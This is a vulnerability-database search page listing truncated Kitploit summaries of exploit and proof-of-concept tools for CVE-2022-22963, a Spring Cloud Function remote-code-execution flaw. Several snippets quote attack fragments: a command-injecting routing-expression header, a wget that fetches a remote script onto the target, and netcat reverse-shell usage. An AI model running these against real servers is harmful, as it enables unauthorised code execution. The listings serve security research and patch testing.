Lucene search
+L

172 matches found

Kitploit
Kitploit
added 2026/09/13 4:32 p.m.8 views

spring-cloud-function-rce

Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963) Spring框架为现代基于java的企业应用程序在任何类型的部署平台上提供了一个全面的编程和配置模型。 Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理,造成Spel表达式注入,攻击者可通过该漏洞执行任意代码。 影响范围:3.0.0.RELEASE...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 12:58 p.m.10 views

Spring-CVE

Spring CVE漏洞 这包括 CVE-2022-22963(一个 Spring SpEL / 表达式资源访问漏洞)以及 CVE-2022-22965(spring-webmvc/spring-webflux 远程代码执行漏洞,称为 "SpringShell")。 CVE-2022-22963 在 Spring Cloud Function 3.1.6、3.2.2 及更早的不受支持版本中,当使用路由功能时,用户可以提供精心构造的 SpEL 作为路由表达式,可能导致远程代码执行和访问本地资源。 root@kitploit: python3 poc-CVE-2022-22963.py...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits137
Kitploit
Kitploit
added 2026/09/13 11:36 a.m.8 views

CVE-2022-22963

CVE-2022-22963 CVE-2022-22963 PoC 略作修改,用于英文翻译和检测 https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/SpelRCEPOC.py 。默认情况下,会在目标上执行 whoami,并创建一个 vulnerable.txt 文件,其中包含存在漏洞的 URL。 更多信息请参阅 https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html,...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/13 11:34 a.m.10 views

Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE

Spring Cloud Function 漏洞 CVE-2022-22963 RCE 这是 Spring4Shell CVE-2022-22963 的 Python 实现,影响运行 Spring Cloud Function =3.1.6(3.1.x 版本)和 =3.2.2(3.2.x 版本)的服务。 结合了多个网上公开的 POC 作者: Randall Banner 日期: 17/04/23 描述: 脚本会在当前目录创建 shell.sh,其中包含一个简单的 bash 反向 shell 单行命令。然后启动一个 Web 服务器,通过 wget 将其提供给受害目标(输出到 /dev/sh...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 11:20 a.m.7 views

cve-2022-22963

Spring Cloud Function SpEL - cve-2022-22963 Construcción root@kitploit: $ git clone https://github.com/twseptian/cve-2022-22963.git $ cd cve-2022-22963 $ docker build . -t spring-spel-0day $ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day Payload root@kitploit:...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 8:49 a.m.5 views

SpringCloudFunction-Research

SpringCloudFunction-Research CVE-2022-22963 research 環境 vulfocus/spring-cloud-function-rce:latest 成因 Request Header 中 spring.cloud.function.routing-expression 參數解析問題,造成注入Payload攻擊。 Reference https://hosch3n.github.io/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/13 8:48 a.m.6 views

CVE-2022-22963

CVE-2022-22963 spring cloud function sple rce spring cloud function 一键利用工具! by charis 博客https://charis3306.top/ 已打包为exe文件开箱即用 命令主题 root@kitploit: usage: Spring-cloud-function-spel0.2.exe -h --check CHECK --route ROUTE --url URL --ip IP --port PORT --proxies PROXIES --cmd CMD spring cloud function...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 7:38 a.m.5 views

CVE-2022-22963

CVE-2022-22963 - Spring4shell To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: root@kitploit: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: root@kitploit: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:808...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/13 6:52 a.m.31 views

spring-spel-0day-poc

spring-spel-0day-poc spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header root@kitploit: spring.cloud.function.routing-expression:Tjava.lang.Runtime.getRuntime.exec"open -a calculator.app" build root@kitploit: wget...

5.4AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/13 6:52 a.m.6 views

spring-spel-0day-poc

spring-spel-0day-poc POC y EXP de RCE para spring-cloud/spring-cloud-function https://github.com/spring-cloud/spring-cloud-function cabecera root@kitploit: spring.cloud.function.routing-expression:Tjava.lang.Runtime.getRuntime.exec"open -a calculator.app" compilación root@kitploit: wget...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/13 5:17 a.m.9 views

CVE-2022-22963-Exploit

CVE-2022-22963 漏洞利用 该存储库包含一个基于 Rust 的漏洞利用程序,针对在 Spring Cloud Function 3.1.6、3.2.2 及更早的不受支持版本中发现的 CVE-2022-22963 漏洞。该漏洞允许通过将特制 Spring 表达式(SpEL)用作 routing-expression 来实现远程代码执行并访问本地资源。 描述 在 Spring Cloud Function 3.1.6、3.2.2 及更早的不受支持版本中,使用路由功能时,用户可以提供特制的 SpEL 作为 routing-expression,这可能导致远程代码执行并访问本地资源。...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 1:44 a.m.7 views

RCE-in-Spring-Cloud-CVE-2022-22963

Spring Cloud RCE 漏洞利用工具 CVE-2022-22963 用于 CVE-2022-22963 远程命令执行的 Spring Cloud Function 漏洞利用工具 关于此漏洞的详细信息,请参见此处和此处 PoC 在你的主机上运行 netcat: root@kitploit: $ nc -lvnp 9001 在攻击者主机上使用默认端口 9001 运行漏洞利用工具(示例): root@kitploit: $ ./exploit.sh site.com 10.10.14.122 ---Reverse Shell Exploit for CVE-2022-22963 RC...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/13 1:08 a.m.6 views

CVE-2022-22963-POC

CVE-2022-22963 Exploit Descripción En Spring Cloud Function versiones 3.1.6, 3.2.2 y versiones anteriores no soportadas, al usar la funcionalidad de enrutamiento es posible que un usuario proporcione un SpEL especialmente manipulado como expresión de enrutamiento que puede resultar en ejecución...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/13 12:50 a.m.16 views

SpringExploitGUI

SpringExploitGUIv1.0 0x01 前言 ​ 今天复现了几个spring之前的漏洞,顺手就武器化了下,工具目前支持Spring Cloud Gateway RCECVE-2022-22947、Spring Cloud Function SpEL RCE CVE-2022-22963、Spring Framework RCE CVE-2022-22965 的检测以及利用,目前仅为第一个版本,后续会添加更多漏洞POC,以及更多的持久化利用方式 0x02 工具使用说明 单个检测 &&批量检测 工具支持单个漏洞单个目标检测,也支持多个目标检测 漏洞利用 Spring Cloud...

10CVSS7.5AI score0.99938EPSS
SaveExploits187
Kitploit
Kitploit
added 2026/09/12 11:00 p.m.6 views

CVE-2022-22963

CVE-2022-22963 在Spring Cloud Function的3.1.6、3.2.2及更早版本中,当使用路由功能时,用户可能提供特制的SpEL作为路由表达式,从而导致远程代码执行和本地资源访问。 PoC 克隆仓库 root@kitploit: git clone https://github.com/jrbH4CK/CVE-2022-22963.git 进入文件夹 root@kitploit: cd CVE-2022-22963 更改执行权限 root@kitploit: chmode +x springCloud.sh 在所需端口启动nc root@kitploit: n...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/12 10:36 p.m.6 views

CVE-2022-22963

CVE-2022-22963 CVE-2022-22963 PoC 略微修改,用于英语翻译和对 https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/SpelRCEPOC.py 的检测。默认情况下,对目标执行 whoami 命令,并创建一个 vulnerable.txt 文件,其中包含存在漏洞的 URL。 利用此漏洞非常容易实现。下面给出了利用该漏洞的 curl 命令。 curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37References2
Kitploit
Kitploit
added 2026/09/12 8:57 a.m.15 views

CVE-2022-22963-PoC

CVE-2022-22963: Exploit RCE de Spring4Shell Esta es una implementación en Python de Spring4Shell, CVE-2022-22963, que afecta a los servicios que ejecutan Spring Cloud Function /tmp/rce $ python exploit.py 10.10.10.10:8080 'wget http://10.10.10.60/test.sh -O /tmp/test.sh' + Host is vulnerable +...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37References1
Kitploit
Kitploit
added 2026/09/10 6:05 p.m.5 views

CVE-2022-22963

CVE-2022-22963 Spring Cloud Function SpEL Expression Injection Remote Code Execution Vulnerability Detection and Exploitation Tool. Vulnerability Overview CVE-2022-22963 is a high-severity RCE vulnerability CVSS 9.8 in the routing functionality of Spring Cloud Function. When the application enabl...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/09 11:57 a.m.9 views

CVE-2022-22963

CVE-2022-22963 CVE-2022-22963 Spring-Cloud-Function-SpELRCE漏洞复现 需要有Docker环境 启动漏洞环境方式1 root@kitploit: git clone https://github.com/RanDengShiFu/CVE-2022-22963.git;cd CVE-2022-22963;bash Start.sh 启动漏洞环境方式2 root@kitploit: rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone...

9.8CVSS7.6AI score0.99938EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/09 11:36 a.m.7 views

CVE-2022-22963

CVE-2022-22963-Reverse-Shell-Exploit 这是一个利用 CVE-2022-22963 的 Python 脚本。CVE-2022-22963 是 Spring Cloud Function 中的一个远程代码执行漏洞,攻击者可在易受攻击的服务器上执行任意代码。该漏洞利用存在漏洞的 /functionRouter 端点,在目标服务器上执行命令。 用法 运行以下命令安装所需的 Python 库: root@kitploit: pip3 install requests chmod +x springexploit.py 通过 -u 或 --url 选项提供目标 U...

9.8CVSS7.5AI score0.99938EPSS
SaveExploits37
Rows per page
Query Builder